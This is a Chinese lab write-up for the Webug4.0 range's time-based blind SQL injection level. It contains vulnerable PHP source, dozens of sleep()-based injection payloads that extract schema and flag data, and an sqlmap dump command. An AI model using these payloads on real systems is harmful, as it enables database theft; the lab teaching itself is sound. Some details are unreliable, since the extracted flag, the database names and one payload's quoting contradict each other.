目錄
一、源碼分析
1.分析閉合
2.分析輸出
(1)查詢成功
(2)查詢失敗
(3)SQL語句執行報錯
二、第03關 延時注入
1.打開靶場
2.SQL手注
(1)盲注分析
(2)獲取數據庫長度
(3)獲取數據庫名稱
(4)獲取數據庫中表名的數量
(5)獲取當前數據庫的表名長度
(6)獲取當前數據庫的表名
(7)獲取env_list表的列名
(8)獲取env_list的所有字段
3.sqlmap滲透
(1)bp抓包保存
(2)sqlmap注入
(3)獲取flag
三、總結
本文通過《Webug4.0靶場通關筆記系列》來進行Webug4.0靶場的滲透實戰,本文講解Webug4.0靶場第3關時間盲注的滲透實戰,該關卡源碼與第02關一致,只是滲透方法由布爾盲注改為時間盲注。
一、源碼分析
打開靶場,會發現第02關和第03關的源碼相同,均使用bool_injection.php文件
<?phprequire_once "../../common/common.php";
if (!isset($_SESSION['user'])) {header("Location:../login.php");
}if (isset($_GET["id"])) {if (!empty($_GET["id"])) {$sql = "SELECT * FROM sqlinjection WHERE id = '{$_GET['id']}'";$res = $dbConnect->query($sql);}
}
require_once TPMELATE."/bool-injection_1.html";
1.分析閉合
SQL語句如下所示,使用單引號閉合參數id。
SELECT * FROM sqlinjection WHERE id = '{$_GET['id']}'
2.分析輸出
相對于第01關,區別就是這一關卡對于SQL查詢錯誤的情況沒有進行輸出報錯信息。
(1)查詢成功
這種情況查到了的話,輸出實際內容,?當參數id=2時,如下所示顯示hello。
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=2
?嘗試萬能注入,如下所示。
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1' or 1=1#
(2)查詢失敗
沒查到的話,無報錯,顯示如下。
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1
(3)SQL語句執行報錯
比如說加上單引號等信息,此時SQL語句錯誤,卻也輸出同樣的內容。
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=-1'
綜上所述,此注入為不屬于嚴格意義的布爾型注入(雖然錯誤時無報錯,但是正確時卻又多種輸出),同時仍然可以使用UNION法進行滲透,故而本關卡屬于名不副實,不算是布爾注入。
二、第03關 延時注入
1.打開靶場
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
2.SQL手注
(1)盲注分析
由于SQL查詢失敗和SQL語句執行有誤的打印信息相同,這部分存在時間盲注風險。構造注入命令如下所示。
id=1' and if(length(database())>1,sleep(3),1) %23
注入語句如下所示。
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1' and if(length(database())>1,sleep(3),1) %23
如下響應時間大于3秒,存在SQL注入風險。
(2)獲取數據庫長度
判斷數據庫的長度的注入命令如下所示,
id=1' and if(length(database())=1,sleep(3),1)%23
id=1' and if(length(database())=2,sleep(3),1)%23
id=1' and if(length(database())=3,sleep(3),1)%23
id=1' and if(length(database())=4,sleep(3),1)%23
id=1' and if(length(database())=5,sleep(3),1)%23#成功
如下所示,獲取到數據庫長度為5
(3)獲取數據庫名稱
id=1' and if(substr((select database()),1,1)='w',sleep(5),1)%23
id=1' and if(substr((select database()),2,1)='e',sleep(5),1)%23
id=1' and if(substr((select database()),3,1)='b',sleep(5),1)%23
id=1' and if(substr((select database()),4,1)='u',sleep(5),1)%23
id=1' and if(substr((select database()),5,1)='g',sleep(5),1)%23
如下所示,滲透獲取數據庫的名稱為webug


?(4)獲取數據庫中表名的數量
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=1,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=2,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=3,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=4,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=5,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=6,sleep(5),1)%23
id=1' and if((select count(table_name) from information_schema.tables where table_schema=database())=7,sleep(5),1)%23
?基于此,獲取到共有7個表格。
(5)獲取當前數據庫的表名長度
時間注入命令如下所示。
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=1,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=2,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=3,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=4,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=5,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=6,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=7,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=8,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 0,1),1))=9,sleep(5),1)%23
如下所示,第一個表格長度為9。?
?爆出數據庫第2個表格長度。
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=1,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=2,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=3,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=4,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=5,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=6,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=7,sleep(5),1)%23
id=1' and if(length(substr((select table_name from information_schema.tables where table_schema=database()limit 1,1),1))=8,sleep(5),1)%23 #成功
如上所示第2個表格長度為8,可以求的websec數據庫的每個表長度,分別9、8、8、4·、12、4、9 。
(6)獲取當前數據庫的表名
第一個表格的名字,如下所示為data_crud。
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))='d',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))='a',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))='t',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=a',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))='_',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))='c',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))='r',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))='u',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))='d',sleep(5),1)%23
第二個表名為env_list,注入命令如下所示。
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))='e',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))='n',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),3,1))='v',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),4,1))='_',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),5,1))='l',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),6,1))='i',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),7,1))='s',sleep(5),1)%23
id=1' and if((substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),8,1))='t',sleep(5),1)%23
?
以此類推,所有表名分別為data_crud,env_list,env_path,flag,sqlinjection,user,user_test 。
(7)獲取env_list表的列名
?如下所示,列長度為2。
id=1' and if((select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =1,sleep(5),1)%23
id=1' and if((select length(column_name) from information_schema.COLUMNS where TABLE_NAME='env_list' limit 0,1) =2,sleep(5),1)%23
第一列的列名注入命令如下所示。
id=1' and if(mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),1,1)='i',sleep(5),1)%23
id=1' and if(mid((select COLUMN_NAME from information_schema.COLUMNS where TABLE_NAME ='env_list' limit 0,1),2,1)='d',sleep(5),1)%23
如下可知第1列的列名為id,如下所示。
以此類推,可以獲取所有列的名稱,分別為id, envName, envDesc, envIntegration, delFlag, envFlag, level, type。
(8)獲取env_list的所有字段
?如下獲取env_list表flag列的第一個字段,如下所示為dfafdasfafdsadfa。
id=1' and if((substr((select flag from flag limit 0,1),1,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),2,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),3,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),4,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),5,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),6,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),7,1))='s',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),8,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),9,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),10,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),11,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),12,1))='s',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),13,1))='a',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),14,1))='d',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),15,1))='f',sleep(5),1)%23
id=1' and if((substr((select flag from flag limit 0,1),16,1))='a',sleep(5),1)%23
時間注入相對耗時,建議使用bp半自動化或者sqlmap或者python腳本進行注入,如下所示,最后獲取到的flag信息如下所示。
第三關的flag為gfdgdfsdg。
3.sqlmap滲透
(1)bp抓包保存
http://192.168.71.1/webug4/control/sqlinject/bool_injection.php?id=1
bp抓包并將報文保存為webug02.txt。
?
(2)sqlmap注入
由于第03關與第02關源碼一樣,故而可以這里使用webug02.txt進行注入,完整交互如下
為了區分,這里可以加上--tech T命令。
sqlmap -r webug02.txt --current-db --batch --tech T -D webug -T env_list --dump
找到SQL盲注點,效果如下所示。
?
(3)獲取flag
如下所示,flag為gfdgdfsdg,滲透成功。
?
獲取的flag如下所示。
Flag: gfdgdfsdg
實際上時間注入非常慢且耗時過久,建議可以通過較快的方法實現注入就不要用時間盲注法,這里只是使用--current-db 參數獲取數據庫即可。
三、總結
SQL注入主要分析幾個內容。
(1)閉合方式是什么?webug靶場的第02關關卡為字符型,閉合方式為單引號。
(2)注入類別是什么?這部分是普通的字符型GET注入,可以使用時間型盲注,使用union法即可注入成功,也可以使用相對復雜的布爾注入方法。
(3)是否過濾了關鍵字?很明顯通過源碼,iwebsec的第02關和第03關卡沒有進行任何過濾。
了解了如上信息就可以針對性使用SQL注入法進行滲透,使用sqlmap工具滲透更是事半功倍,以上就是今天要講的webug靶場第03關注入內容,初學者建議按部就班先使用手動注入練習,再進行sqlmap滲透。不過能用簡單的方法注入成功,都不建議使用復雜的方法進行注入啊,否則是真的費時費力啊。